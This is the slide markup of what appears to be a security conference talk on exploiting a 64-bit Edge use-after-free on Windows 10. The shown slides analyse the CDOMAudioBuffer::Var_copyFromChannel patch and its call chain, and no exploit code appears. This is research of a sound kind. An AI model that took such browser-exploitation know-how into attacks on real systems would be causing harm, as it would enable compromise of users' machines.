          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1470091" y="6136441"/>
            <a:ext cx="9411269" cy="2213081"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" spc="600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>The Advanced Exploitation of 64-bit Edge Browser Use-After-Free Vulnerability on Windows 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:cs typeface="Hiragino Sans GB W6" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="副标题 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1470091" y="8034328"/>
            <a:ext cx="9006320" cy="630387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="189000" tIns="94500" rIns="189000" bIns="94500" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>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a:buNone/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>Speaker: Liu Jin Company Name: McAfee Title: Security Researcher</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:cs typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7615291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Patch Analysis</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{417A97F9-A846-4DC3-A049-1BB694508F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078123" y="3445112"/>
            <a:ext cx="10953455" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The comparison with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AudioBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> related patch</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="内容占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98D63D3F-1BCE-45E3-BF36-B73ABCCA3649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="868929" y="4814700"/>
            <a:ext cx="11371845" cy="3633442"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1511285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Patch Analysis</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{417A97F9-A846-4DC3-A049-1BB694508F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078123" y="2576791"/>
            <a:ext cx="10953455" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The patch of the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CDOMAudioBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Var_copyFromChannel</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBC30C4D-8C34-4BB6-9E4C-285B6516C72B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078120" y="3064553"/>
            <a:ext cx="5348815" cy="5979117"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC65D3B8-350A-47CE-B8A1-88BC6A85CE29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6467622" y="3064554"/>
            <a:ext cx="5348815" cy="6181046"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2628514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Patch Analysis</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89982370-2067-429E-AACC-FDECB524A75F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101948" y="2631944"/>
            <a:ext cx="10419915" cy="5876096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>audioBuf.copyFromChannel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(t2, 0, 0) has the following call relationship:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CFastDOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CAudioBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Profiler_copyFromChannel</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CFastDOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CAudioBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Trampoline_copyFromChannel</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Patched function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDOMAudioBuffer::Var_copyFromChannel</a:t>
            </a:r>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endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742889" indent="-742889">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JsStaticAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DataConversion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VarToInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>calls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742889" indent="-742889">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WTF::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JSOwnedTypedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;1,float&gt;::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JSOwnedTypedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;1,float&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742889" indent="-742889">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WebCore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AudioBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>copyFromChannelData</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="直接箭头连接符 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B22A451-B9EE-482C-BA96-7B689388BD70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4102909" y="3803668"/>
            <a:ext cx="0" cy="9144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直接箭头连接符 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3548D823-778F-4CEF-A339-CACC509A8945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088394" y="5073671"/>
            <a:ext cx="0" cy="9144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直接箭头连接符 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82CF85A2-7AC1-40C1-BB14-6E5B03CC6BB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4097969" y="6430753"/>
            <a:ext cx="0" cy="9144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931869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Patch Analysis</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7687FDB-CDA0-41CB-9339-DCB845DE7341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="9488431" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CDOMAudioBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Var_copyFromChannel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> before patch</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="内容占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B32E01EB-4470-418A-B5C3-B93B81FCF902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025878" y="3688156"/>
            <a:ext cx="10953455" cy="4634657"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0659BBA9-993F-4F44-B4D4-F97B4F135841}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5831573" y="6212340"/>
            <a:ext cx="531128" cy="27990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15" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2656EC56-653A-45DC-8252-A7DD4E71C29A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694733" y="7056119"/>
            <a:ext cx="580588" cy="26993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16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E31AE19B-E956-4C92-ABE1-52CEAF59A9DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025879" y="3897743"/>
            <a:ext cx="1260122" cy="25530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19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12BF2007-70AE-41C9-B7A1-9A36B10E193D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8896084" y="5399881"/>
            <a:ext cx="477911" cy="19319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20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A2448E6-BA70-4E9D-9B16-0F2FF324308E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025878" y="8424918"/>
            <a:ext cx="10953455" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>v6, v7[2], v[3] correspond to the parameters t2, 0, 0 in </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>audioBuf.copyFromChannel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(t2, 0, 0) respectively.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
